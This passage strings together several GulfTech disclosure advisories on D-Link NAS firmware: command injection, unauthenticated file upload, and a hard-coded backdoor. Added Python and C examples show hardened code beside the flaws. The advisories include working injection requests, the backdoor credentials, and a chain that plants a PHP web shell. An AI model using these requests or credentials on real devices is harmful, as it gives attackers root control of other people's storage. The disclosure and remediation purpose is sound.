    sprintf(&s, "email -h %s -p 25 -a 0 -s %s -d %s -t", v4, v5, v6);
    v2 = &dword_8D968;
    v8 = &s;
  }
  else
  {
    sprintf(&s, "email -h %s -p 25 -a 1 -u %s -w %s -s %s -d %s -t", v4, v11, v10, v5, v6);
    v8 = &s;
  }
  *v2 = system(v8);
  *v2 = sub_27C80();
  return THISISAREDIRECT(v1, "web/maintenance/test_mail_result.asp");
}

As can be seen in the above pseudocode, the form data passed to the goForm
endpoint is never sanitized, and is then used directly in a system() call.
This can be leveraged by an unauthenticated remote attacker to execute code
as root and take complete control of the device.
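A defensive counterpart to the pattern above, written as an added example in Python (not code from the advisory, from GulfTech or from D-Link). The first function models the string that sub_27D24 hands to system(), so the effect of a metacharacter in f_smtpserver is visible without running anything; the second builds the same command as an argv list after allow-list validation of every field, which is how the firmware should have invoked its mail helper. The field names and the two command templates come from the decompiled code above; the validation rules (an RFC 1123 host name or IPv4 literal for the server, plain user@host addresses for sender and recipient) are my assumptions about what the device legitimately needs.

```python
import re
import shlex

# Allow-lists. Assumption: the SMTP server is an RFC 1123 host name or an
# IPv4 literal, and sender/recipient are plain user@host addresses.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
_IPV4 = re.compile(r"^(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)$")
_EMAIL = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,253}$")


class InvalidFieldError(ValueError):
    """Raised when a form field fails its allow-list; the request is refused."""


def firmware_shell_command(form):
    """Model of what sub_27D24 builds with sprintf() and passes to system().

    Never executed here; it only shows that a field value is spliced into the
    command line verbatim, so a ';' ends the 'email' command and starts a new one.
    f_auth == "1" selects the authenticated template, anything else the anonymous one."""
    if form.get("f_auth", "") == "1":
        return "email -h %s -p 25 -a 1 -u %s -w %s -s %s -d %s -t" % (
            form.get("f_smtpserver", ""), form.get("f_username", ""),
            form.get("f_password", ""), form.get("f_sender", ""),
            form.get("f_sendto", ""))
    return "email -h %s -p 25 -a 0 -s %s -d %s -t" % (
        form.get("f_smtpserver", ""), form.get("f_sender", ""),
        form.get("f_sendto", ""))


def validate_host(host):
    if _IPV4.match(host) or _HOSTNAME.match(host):
        return host
    raise InvalidFieldError("f_smtpserver rejected: %r" % host)


def validate_email(field, value):
    if _EMAIL.match(value):
        return value
    raise InvalidFieldError("%s rejected: %r" % (field, value))


def validate_credential(field, value):
    # Credentials travel as their own argv entry, so they only need to be
    # non-empty, bounded, and free of NUL (an argv string cannot carry NUL).
    if 0 < len(value) <= 128 and "\x00" not in value:
        return value
    raise InvalidFieldError("%s rejected" % field)


def build_email_argv(form):
    """Hardened equivalent: validate every field, then return an argv list.

    With a list, each value reaches execve() as exactly one argument and no
    shell ever parses it; subprocess.run(argv) would replace system() at the
    call site. The branch structure mirrors the two templates in sub_27D24."""
    host = validate_host(form.get("f_smtpserver", ""))
    sender = validate_email("f_sender", form.get("f_sender", ""))
    sendto = validate_email("f_sendto", form.get("f_sendto", ""))
    argv = ["email", "-h", host, "-p", "25"]
    if form.get("f_auth", "") == "1":
        user = validate_credential("f_username", form.get("f_username", ""))
        pwd = validate_credential("f_password", form.get("f_password", ""))
        argv += ["-a", "1", "-u", user, "-w", pwd]
    else:
        argv += ["-a", "0"]
    argv += ["-s", sender, "-d", sendto, "-t"]
    return argv


def is_acceptable(form):
    """True if every field passes validation, False otherwise."""
    try:
        build_email_argv(form)
        return True
    except InvalidFieldError:
        return False


def audit_string(argv):
    """For logging only: shlex.join() quotes each element so the record is unambiguous."""
    return shlex.join(argv)
```

The allow-list check is the real fix; the argv form is defence in depth. Even if a value slipped past validation, the kernel would hand it to the helper as one opaque argument rather than letting /bin/sh split it on ';'.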

--[ 01.2 - Remote exploitation

Exploiting this issue is trivial, and can be achieved by simply sending a 
post request containing a command injection string within one of the fields
that are affected to the "/goform/Mail_Test" endpoint. I achieved this by 
sending a post request with the following data.

f_smtpserver=;touch /tmp/gulftech;

The above post request successfully creates the file named "gulftech" 
within the /tmp directory as the root user.


--[ 02 - Credit

James Bercegay
GulfTech Research and Development


--[ 03 - Proof of concept

We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.


--[ 04 - Solution

D-Link were notified of these issues in June of last year. No update has
been released publicly.


--[ 05 - Contact information

Web
https://gulftech.org/

Mail
security@gulftech.org


Copyright 2018 GulfTech Research and Development. All rights reserved.
            
D-Link DNS-325 ShareCenter Multiple Vulnerabilities

Vendor: D-Link
Product: D-Link DNS-325 ShareCenter
Version: <= 1.05B03
Website: http://sharecenter.dlink.com/products/DNS-325


###########################################################################
                     ______      ____________          __  
                    / ____/_  __/ / __/_  __/__  _____/ /_ 
                   / / __/ / / / / /_  / / / _ \/ ___/ __ \
                  / /_/ / /_/ / / __/ / / /  __/ /__/ / / /         
                  \____/\__,_/_/_/   /_/  \___/\___/_/ /_/ 
                                                                
                     GulfTech Research and Development                                                                 

###########################################################################
#     D-Link DNS-325 ShareCenter <= 1.05B03  Multiple Vulnerabilities     #
###########################################################################
 

Released Date: 2017-01-15
Last Modified: 2017-06-22
 Company Info: D-Link
 Version Info: 
              Vulnerable
               D-Link DNS-325 ShareCenter <= 1.05B03
 

--[ Table of contents

00 - Introduction
    00.1 Background

01 - Unrestricted File Upload
    01.1 - Vulnerable code analysis
    01.2 - Remote exploitation

02 - Command Injection
    02.1 - Vulnerable code analysis
    02.2 - Remote exploitation

03 - Credit

04 - Proof of concept

05 - Solution

06 - Contact information


--[ 00 - Introduction

The purpose of this article is to detail the research that I have recently 
completed regarding the D-Link DNS 325 ShareCenter.

--[ 00.1 - Background

The D-Link ShareCenter DNS-325 2-Bay Network Storage Enclosure is an 
easy-to-use solution for accessing, sharing and backing up your important data.


--[ 01 - Unrestricted file upload

The DNS-325 is vulnerable to the same file upload issue as the DNS-320L. 
The vulnerable code can be found within the following file:

/usr/local/modules/web/pages/jquery/uploader/multi_uploadify.php

The root of the problem is the misuse, and misunderstanding, of the PHP
gethostbyaddr() function by the developer of this particular piece of code.
The PHP manual defines the return values of gethostbyaddr() as follows:

"Returns the host name on success, the unmodified ip_address on failure, or 
FALSE on malformed input."

With a brief overview of the problem, let's have a look 
at the offending code in order to get a better understanding of what is 
going on with this particular vulnerability.

--[ 01.1 - Vulnerable code analysis

Below is the code from the vulnerable "multi_uploadify.php" script. We have
annotated the code to explain what is happening.

#BUG 01: Here the attacker controlled "Host" header is used to define the 
remote auth server. This is by itself really bad, as an attacker could
easily just specify that the host be the IP address of a server that they
are in control of. But, if we send it an invalid "Host" header it will just
simply return FALSE as defined in the PHP manual.

$ip = gethostbyaddr($_SERVER['HTTP_HOST']);
$name = $_REQUEST['name'];
$pwd = $_REQUEST['pwd'];
$redirect_uri =  $_REQUEST['redirect_uri']; 

//echo $name ."<br>".$pwd."<br>".$ip;

#BUG 02: At this point, this request should always fail. The $result
variable should now be set to FALSE.

$result = @stripslashes( @join( @file( "http://".$ip."/mydlink/mydlink.cgi?cmd=1&name=".$name."=&pwd=".$pwd ),"" ));

#BUG 03: Here an empty haystack is searched, and thus strstr() returns a
value of FALSE.

$result_1 = strstr($result,"0");
$result_1 = substr ($result_1, 0,28);  

#BUG 04: The strncmp() call here is a strange one. It looks for a specific
login failure. So, it never accounts for when things go wrong or slightly
unexpected. As a result this "if" statement will always be skipped.

if (strncmp ($result_1,"0",28) == 0 )
//if (strstr($result,"0")== 0 )
{
    header("HTTP/1.1 302 Found");
  header("Location: ".$redirect_uri."?status=0");
  exit();   
}

#BUG 05: At this point all checks have been passed, and an attacker can use
this issue to upload any file to the server that they want.

The rest of the source code was omitted for the sake of brevity; it just
handles the file upload logic once the user passes the authentication
checks.
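The five annotations describe a check that fails open: the authentication server address is taken from the client's Host header, and the only outcome that refuses the upload is one exact failure string, so an unreachable server, an empty reply or garbage all pass. The Python below is an added example, not the DNS-325 code or anything from D-Link. legacy_is_authorised() models the original decision so the failure mode can be exercised (using PHP 8 semantics, where substr(false, 0, 28) yields an empty string; under PHP 7 the end result is the same), and is_upload_authorised() shows the fail-closed form with the server address fixed by the operator and the query built with urlencode(). The failure marker "0" and the cmd/name/pwd parameters come from the code above; the success marker "1" and the placeholder server address are assumptions for illustration.

```python
from urllib.parse import urlencode

# Operator-configured, never derived from the request's Host header.
# Placeholder address from the TEST-NET-1 documentation range, not a real server.
MYDLINK_AUTH_SERVER = "192.0.2.10"
LOGIN_FAILURE_MARKER = "0"   # the string the original code searches for
LOGIN_SUCCESS_MARKER = "1"   # assumption: the CGI's explicit success reply


def legacy_is_authorised(result):
    """Model of the original decision in multi_uploadify.php.

    strstr($result, "0") keeps the reply from its first "0" onward, substr()
    caps that at 28 bytes, and the upload is refused only when what remains is
    exactly "0". A failed fetch (FALSE, which becomes an empty string) never
    matches, so the caller falls through to the upload logic."""
    if not isinstance(result, str):        # FALSE from a failed @file()
        result = ""
    idx = result.find(LOGIN_FAILURE_MARKER)
    result_1 = result[idx:idx + 28] if idx != -1 else ""
    return result_1 != LOGIN_FAILURE_MARKER


def build_auth_url(name, pwd):
    """urlencode() escapes '&', '=' and '#', so a crafted name cannot append
    or override parameters the way the original string concatenation allowed."""
    query = urlencode({"cmd": 1, "name": name, "pwd": pwd})
    return "http://%s/mydlink/mydlink.cgi?%s" % (MYDLINK_AUTH_SERVER, query)


def is_upload_authorised(name, pwd, fetch):
    """Fail-closed check. `fetch(url)` returns the body as str or raises.

    Every path other than an exact success reply denies: missing credentials,
    transport errors, non-string bodies, the failure marker, anything else."""
    if not name or not pwd:
        return False
    try:
        body = fetch(build_auth_url(name, pwd))
    except Exception:
        return False                        # unreachable server: deny, never skip
    if not isinstance(body, str):
        return False
    return body.strip() == LOGIN_SUCCESS_MARKER


def reply_with(reply):
    """Stand-in for a network fetch: returns `reply`, or raises it if it is an exception."""
    def fetch(url):
        if isinstance(reply, BaseException):
            raise reply
        return reply
    return fetch
```

The contrast worth noting is in the default branch. The original enumerates one failure and lets everything else through; the hardened version enumerates one success and lets nothing else through, which is what turns a broken Host header or a dead auth server from a bypass into a denial of service on uploads, the safer of the two outcomes.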

--[ 01.2 - Remote exploitation

Exploiting this issue to gain a remote shell as root is a rather trivial
process. All an attacker has to do is send a POST request that contains a 
file to upload in the parameter "Filedata[0]", the location for the file to
be uploaded to in the "folder" parameter, and of course a bogus "Host"
header.

We have written a Metasploit module to exploit this issue. The module will
use this vulnerability to upload a PHP webshell to the "/var/www/"
directory. Once uploaded, the webshell can be executed by requesting a URI
pointing to the backdoor, and thus triggering the payload.


--[ 02 - Command Injection

There are a number of issues with the CGIs contained within the DNS-325
file structure. The issues that we came across over and over were lack of
authentication, as well as command injection. We will examine one of these
issues, and leave the others as an exercise for the reader.


--[ 02.1 - Vulnerable code analysis

The CGI binary named "photocenter_mgr.cgi" is vulnerable to a very 
straightforward command injection issue when calling the
"cgi_set_airplay_device" function.

size_t cgi_set_airplay_device()
{
  int v0; // r4@3
  size_t v1; // r0@3
  const char *v2; // r0@3
  FILE *v3; // r5@5
  char *v4; // r0@6
  int v5; // r4@7
  signed int v6; // r6@7
  size_t result; // r0@13
  FILE *v8; // r4@11
  int v9; // [sp+10h] [bp-C84h]@1
  int v10; // [sp+410h] [bp-884h]@1
  int v11; // [sp+610h] [bp-684h]@1
  int v12; // [sp+810h] [bp-484h]@1
  char s; // [sp+A10h] [bp-284h]@1
  char v14; // [sp+B10h] [bp-184h]@1
  char v15; // [sp+B50h] [bp-144h]@1
  char v16; // [sp+B90h] [bp-104h]@1
  signed int v17; // [sp+B94h] [bp-100h]@2
  signed int v18; // [sp+B98h] [bp-FCh]@2
  signed int v19; // [sp+B9Ch] [bp-F8h]@2
  int v20; // [sp+BA0h] [bp-F4h]@2
  __int16 v21; // [sp+BA4h] [bp-F0h]@15
  char v22; // [sp+BA6h] [bp-EEh]@15
  char v23; // [sp+BD0h] [bp-C4h]@1
  char v24; // [sp+C10h] [bp-84h]@1
  int v25; // [sp+C50h] [bp-44h]@1
  int v26; // [sp+C54h] [bp-40h]@1
  char dest[4]; // [sp+C58h] [bp-3Ch]@1
  int v28; // [sp+C5Ch] [bp-38h]@1
  int v29; // [sp+C60h] [bp-34h]@1
  int *v30; // [sp+C64h] [bp-30h]@1

  memset(&s, 0, 0x100u);
  memset(&v12, 0, 0x200u);
  memset(&v24, 0, 0x40u);
  memset(&v23, 0, 0x40u);
  memset(&v11, 0, 0x200u);
  v30 = 0;
  memset(&v9, 0, 0x400u);
  *(_DWORD *)dest = 0;
  v28 = 0;
  memset(&v10, 0, 0x200u);
  v25 = 0;
  v26 = 0;
  memset(&v16, 0, 0x40u);
  memset(&v15, 0, 0x40u);
  memset(&v14, 0, 0x40u);
  cgiFormString("dev_name", &s, 256);
  cgiFormString("dev_type", &v24, 64);
  cgiFormString("dev_pw", &v23, 64);
  cgiFormString("type", &v25, 8);
  v30 = &v12;
  v29 = 512;
  printf_out("dev_name=[%s]\n", &s);
  printf_out("dev_type=[%s]\n", &v24);
  printf_out("dev_pw=[%s]\n", &v23);
  printf_out("type=[%s]\n", &v25);
  if ( !strcmp((const char *)&v25, "photo") )
  {
    LOBYTE(v20) = 0;
    *(_DWORD *)&v16 = 1886221359;
    v17 = 1919508783;
    v18 = 2036427888;
    v19 = 1819113518;
  }
  else
  {
    *(_DWORD *)&v16 = 1886221359;
    v17 = 'ria/';
    v18 = 2036427888;
    v19 = 1685414239;
    v20 = 2016309097;
    v22 = 0;
    v21 = 'lm';
  }
  v0 = 0;
  sprintf((char *)&v11, "rm -f %s", &v16);
  system((const char *)&v11);
  v1 = strlen(&s);
  v2 = (const char *)escape_label(&s, v1, &v30, &v29);
  cgi_api_SpecSymbol2BackSlash((char *)&v9, v2);
  sprintf((char *)&v11, "airplayer -c connect -d \"%s\" -t \"%s\" %s >/dev/null", &v9, &v24, &v23);
  printf_out("[%s]\n", &v11);
  system((const char *)&v11);
  printf_out("filename[%s]\n", &v16);
  while ( 1 )
  {
    ++v0;
    v3 = (FILE *)fopen64(&v16, "r");
    if ( v3 )
      break;
    printf_out("wait[%d]\n");
    sleep(1u);
    if ( v0 == 30 )
    {
      v6 = (signed int)v3;
      goto LABEL_9;
    }
  }
  fgets(&v15, 512, v3);
  fgets(&v15, 512, v3);
  fgets(&v15, 512, v3);
  fgets(&v14, 512, v3);
  v4 = index(&v14, 62);
  if ( v4 )
  {
    v5 = (int)(v4 + 1);
    v6 = 1;
    *index(v4 + 1, 60) = 0;
    strcpy(dest, v4 + 1);
    printf_out("res[%s]\n", v5);
  }
  else
  {
    v6 = 0;
  }
  fclose(v3);
LABEL_9:
  sprintf(&v16, "/var/www/xml/airplay_info_%s.xml", &v25);
  if ( dest[0] == 48 && !dest[1] )
  {
    v8 = (FILE *)fopen64(&v16, "w+");
    fwrite("", 1u, 0x26u, v8);
    sprintf(
      (char *)&v10,
      "%s",
      &s,
      &v24,
      &v23);
    fputs((const char *)&v10, v8);
    fclose(v8);
  }
  cgiHeaderContentType("text/xml");
  fwrite("", 1u, 0x26u, (FILE *)cgiOut);
  if ( v6 == 1 )
  {
    result = fprintf((FILE *)cgiOut, "%s", dest);
  }
  else
  {
    system("kill `pidof airplay_daemon`");
    result = fwrite("timeout", 1u, 0x25u, (FILE *)cgiOut);
  }
  return result;
}

As we can see in the above pseudocode, parameters taken from form input are
used directly within a system call without being sanitized. Only "dev_name"
passes through an escaping routine; "dev_type" and "dev_pw" are formatted
into the command line as received. This can be leveraged by an attacker to
execute arbitrary commands as root. Authentication is not required to
exploit this issue.
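The pattern above, shown next to a hardened version, as an added example
that is not part of the original advisory or of D-Link's firmware. It
assumes a hypothetical "airplayer" helper at /usr/bin/airplayer (the real
path on the device is not given in the advisory) and applies one allowlist
to all three form values, including the one the CGI escapes, because an
argv vector handed to execv() is never parsed by a shell and so needs no
escaping at all. The unsafe builder only returns the command string so the
injected text can be inspected without running it.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical path of the helper the CGI drives; assumed, not taken
   from the firmware. */
#define AIRPLAYER_PATH "/usr/bin/airplayer"

/* Vulnerable shape, as in cgi_set_airplay_device(): form values are
   formatted straight into a command line that system() hands to /bin/sh.
   This version only builds the string so it can be inspected; a ';' or
   '"' inside dev_type ends the argument and starts a new command. */
int build_airplay_cmd_unsafe(char *out, size_t outlen, const char *dev_name,
                             const char *dev_type, const char *dev_pw)
{
    return snprintf(out, outlen,
                    "airplayer -c connect -d \"%s\" -t \"%s\" %s >/dev/null",
                    dev_name, dev_type, dev_pw);
}

/* Hardening step 1: allowlist validation.  Accept only the characters a
   device name, type or password legitimately needs and cap the length to
   the buffer the CGI allocates (256 / 64 / 64 bytes including the NUL). */
int param_is_safe(const char *s, size_t maxlen)
{
    if (s == NULL)
        return 0;
    size_t n = strlen(s);
    if (n == 0 || n > maxlen)
        return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '_' || c == '-' || c == '.' || c == ' '))
            return 0;
    }
    return 1;
}

/* Hardening step 2: no shell at all.  Parameters travel as separate argv
   entries to execv(), so shell metacharacters are never interpreted.
   Returns the helper's exit status, or -1 if a parameter is rejected or
   the process cannot be started. */
int run_airplayer_safe(const char *dev_name, const char *dev_type,
                       const char *dev_pw)
{
    if (!param_is_safe(dev_name, 255) || !param_is_safe(dev_type, 63) ||
        !param_is_safe(dev_pw, 63))
        return -1;

    char *argv[] = { "airplayer", "-c", "connect", "-d", (char *)dev_name,
                     "-t", (char *)dev_type, (char *)dev_pw, NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        /* child: reproduce the ">/dev/null" redirection without a shell */
        if (freopen("/dev/null", "w", stdout) == NULL)
            _exit(127);
        execv(AIRPLAYER_PATH, argv);
        _exit(127);                 /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* constructed input in the shape of the advisory's PoC request */
    const char *hostile = "1\";touch /tmp/gulftech;\"";
    char cmd[512];

    build_airplay_cmd_unsafe(cmd, sizeof cmd, "AppleTV", hostile, "pw");
    printf("unsafe command line: %s\n", cmd);
    printf("allowlist accepts \"AppleTV\": %d\n", param_is_safe("AppleTV", 63));
    printf("allowlist accepts hostile value: %d\n", param_is_safe(hostile, 63));
    printf("run_airplayer_safe with hostile value: %d\n",
           run_airplayer_safe("AppleTV", hostile, "pw"));
    return 0;
}
```

The allowlist is deliberately narrow; widening it (for example to allow a
quote in a device name) is safe only because the argv path is used, which
is why both steps belong together rather than either one alone.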

--[ 02.2 - Remote exploitation

Exploiting this issue is trivial. Authentication is not required to 
successfully exploit this issue and gain a remote root shell.


POST /cgi-bin/photocenter_mgr.cgi HTTP/1.1
Host: 192.168.0.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

cmd=cgi_set_airplay_device&dev_type=1";touch /tmp/gulftech;"


Simply sending a post request like the one above will successfully create a
file named "gulftech" in the /tmp directory as root.

--[ 03 - Credit

James Bercegay
GulfTech Research and Development


--[ 04 - Proof of concept

We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.


--[ 05 - Solution

D-Link were notified of these issues in June of last year. No update has
been released publicly.


--[ 06 - Contact information

Web
https://gulftech.org/

Mail
security@gulftech.org


Copyright 2018 GulfTech Research and Development. All rights reserved.
DNS-320L ShareCenter Backdoor
Vendor: D-Link
Product: DNS-320L ShareCenter
Version: < 1.06
Website: http://www.dlink.com/uk/en/products/dns-320l-sharecenter-2-bay-cloud-storage-enclosure


###########################################################################
                     ______      ____________          __  
                    / ____/_  __/ / __/_  __/__  _____/ /_ 
                   / / __/ / / / / /_  / / / _ \/ ___/ __ \
                  / /_/ / /_/ / / __/ / / /  __/ /__/ / / /         
                  \____/\__,_/_/_/   /_/  \___/\___/_/ /_/ 
                                                                
                     GulfTech Research and Development                                                                                  

###########################################################################
#                  D-Link DNS-320L ShareCenter Backdoor                   #
###########################################################################
 

Released Date: 2018-01-03
Last Modified: 2017-06-14
 Company Info: D-Link
 Version Info: 
              Vulnerable
               D-Link DNS-320L ShareCenter < 1.06
               Possibly various other ShareCenter devices

              Not Vulnerable
               D-Link DNS-320L ShareCenter >= 1.06
 

--[ Table of contents

00 - Introduction
    00.1 Background

01 - Hard coded backdoor
    01.1 - Vulnerable code analysis
    01.2 - Remote exploitation

02 - Credit

03 - Proof of concept

04 - Solution

05 - Contact information


--[ 00 - Introduction

The purpose of this article is to detail the research that GulfTech has 
recently completed regarding the D-Link DNS-320L ShareCenter.

--[ 00.1 - Background

D-Link Share Center 2-Bay Cloud Storage 2000 (DNS-320L) aims to be a 
solution to share, stream, manage and back up all of your digital files by 
creating your own personal Cloud. 


--[ 01 - Hard coded backdoor

While doing some research on another device, I came across a hard coded
backdoor within one of the CGI binaries. Several different factors such as
similar file structure and naming schemas led me to believe that the code
that was in the other device was also shared with the DNS-320L ShareCenter.
As it turned out our hunch was correct. An advisory regarding the other
vulnerable device in question will be released in the future, as the vendor
for that device is still in the process of addressing the issues.

Now, let's take a moment to focus on the following file which is a standard 
Linux ELF executable and pretty easy to go through. 

/usr/local/modules/cgi/nas_sharing.cgi

The above file can be accessed by visiting "/cgi-bin/nas_sharing.cgi" and
contains the following function that is used to authenticate the user. 

--[ 01.1 - Vulnerable code analysis

Below is the pseudocode created from the disassembly of the binary. I have
renamed the function to "re_BACKDOOR" to visually identify it more easily.

struct passwd *__fastcall re_BACKDOOR(const char *a1, const char *a2)
{
  const char *v2; // r5@1
  const char *v3; // r4@1
  struct passwd *result; // r0@4
  FILE *v5; // r6@5
  struct passwd *v6; // r5@7
  const char *v7; // r0@9
  size_t v8; // r0@10
  int v9; // [sp+0h] [bp-1090h]@1
  char s; // [sp+1000h] [bp-90h]@1
  char dest; // [sp+1040h] [bp-50h]@1

  v2 = a2;
  v3 = a1;
  memset(&s, 0, 0x40u);
  memset(&dest, 0, 0x40u);
  memset(&v9, 0, 0x1000u);
  if ( *v2 )
  {
    v8 = strlen(v2);
    _b64_pton(v2, (u_char *)&v9, v8);
    if ( dword_2C2E4 )
    {
      sub_1194C((const char *)&unk_1B1A4, v2);
      sub_1194C("pwd decode[%s]\n", &v9);
    }
  }
  if (!strcmp(v3, "mydlinkBRionyg") 
  &&  !strcmp((const char *)&v9, "abc12345cba") )
  {
    result = (struct passwd *)1;
  }
  else
  {
    v5 = (FILE *)fopen64("/etc/shadow", "r");
    while ( 1 )
    {
      result = fgetpwent(v5);
      v6 = result;
      if ( !result )
        break;
      if ( !strcmp(result->pw_name, v3) )
      {
        strcpy(&s, v6->pw_passwd);
        fclose(v5);
        strcpy(&dest, (const char *)&v9);
        v7 = (const char *)sub_1603C(&dest, &s);
        return (struct passwd *)(strcmp(v7, &s) == 0);
      }
    }
  }
  return result;
}

As you can see in the above code, the login functionality specifically
looks for an admin user named "mydlinkBRionyg" and will accept the password
of "abc12345cba" if found. This is a classic backdoor. Simply log in with
the credentials just mentioned in the above code.
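The defect above beside a hardened login routine, as an added example that
is not part of the original advisory or of the device's firmware. The
credential store is a constructed in-memory table standing in for the
/etc/shadow lookup, the base64 decoding of the password that re_BACKDOOR()
performs is left out, and verify_secret() is a stand-in for a real hash
comparison such as crypt_r(). The point it shows is structural: the
hardened version has exactly one path to "authenticated", and that path
always goes through the store, so there is nothing a firmware string or a
reverse engineer can find that bypasses it.

```c
#include <stddef.h>
#include <string.h>

/* Constructed credential store standing in for the /etc/shadow lookup in
   re_BACKDOOR().  A real store holds salted password hashes and
   verify_secret() would call crypt_r(); the opaque "verifier" strings keep
   the example self-contained. */
struct account {
    const char *name;
    const char *verifier;
};

static const struct account ACCOUNTS[] = {
    { "admin", "v:constructed-admin-secret" },
    { "guest", "v:constructed-guest-secret" },
};

/* Compare two secrets in time that depends on the presented length, not
   on the position of the first differing byte. */
static int ct_equal(const char *stored, const char *presented)
{
    size_t ls = strlen(stored), lp = strlen(presented);
    unsigned char diff = (unsigned char)(ls != lp);
    for (size_t i = 0; i < lp; i++)
        diff |= (unsigned char)(presented[i] ^ stored[ls ? i % ls : 0]);
    return diff == 0;
}

/* Stand-in for hash verification; see the note on ACCOUNTS. */
static int verify_secret(const char *stored, const char *presented)
{
    return ct_equal(stored, presented);
}

static int lookup_and_verify(const char *user, const char *pw)
{
    for (size_t i = 0; i < sizeof ACCOUNTS / sizeof ACCOUNTS[0]; i++)
        if (strcmp(ACCOUNTS[i].name, user) == 0)
            return verify_secret(ACCOUNTS[i].verifier, pw);
    return 0;                       /* unknown user: fail closed */
}

/* The shape of re_BACKDOOR(): a fixed pair is accepted before the store
   is consulted, so no password change or account removal on the device
   can ever close it. */
int login_with_backdoor(const char *user, const char *pw)
{
    if (strcmp(user, "mydlinkBRionyg") == 0 && strcmp(pw, "abc12345cba") == 0)
        return 1;
    return lookup_and_verify(user, pw);
}

/* Hardened: every request goes through the store, and empty or missing
   values fail closed instead of reaching a comparison. */
int login_hardened(const char *user, const char *pw)
{
    if (user == NULL || pw == NULL || *user == '\0' || *pw == '\0')
        return 0;
    return lookup_and_verify(user, pw);
}
```

A useful review habit this illustrates: any authentication function whose
control flow can return success before touching the credential store is
suspect, whatever the literal it compares against.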

--[ 01.2 - Remote exploitation

Exploiting this backdoor is fairly trivial, but I wanted a root shell, not 
just admin access with the possibility of shell access. So, I started 
looking at the functionality of this file and noticed the method referenced 
when the "cmd" parameter was set to "15". This particular method happened 
to contain a command injection issue. Now I could turn this hard coded
backdoor into a root shell, and gain control of the affected device.

However, our command injection does not play well with spaces, or special 
characters such as "$IFS", so I got around this by just playing ping pong
with pipes, and syslog() in order to create a PHP shell. These are the 
steps that I took to achieve this.

STEP01: We send a logout request to /cgi-bin/login_mgr.cgi?cmd=logout with
the "name" parameter value set to that of our malicious PHP wrapper code 
within our POST data. This "name" parameter is never sanitized.

name=

At this point we have successfully injected our payload into the user logs,
as the name of the user who logs out is written straight to the user logs. A
user does not have to be logged in in order to log out and inject data.

STEP02: We now use cat to read in the user log file and pipe it out to the
web directory in order to create our PHP web shell.

GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=15&user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&system=cat/var/www/shell.php HTTP/1.1

At this point an attacker can now simply visit the newly created web shell
and execute any PHP code that they choose, as root.

http://sharecenterhostname/shell.php?01100111=phpinfo();

By sending a request like the one above a remote attacker would cause the
phpinfo() function to be displayed, thus demonstrating successful remote 
exploitation as root.


--[ 02 - Credit

James Bercegay
GulfTech Research and Development


--[ 03 - Proof of concept

We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.


--[ 04 - Solution

Upgrade to firmware version 1.06 or later. See the official vendor website
for further details.


--[ 05 - Contact information

Web
https://gulftech.org

Mail
security@gulftech.org


Copyright 2018 GulfTech Research and Development. All rights reserved.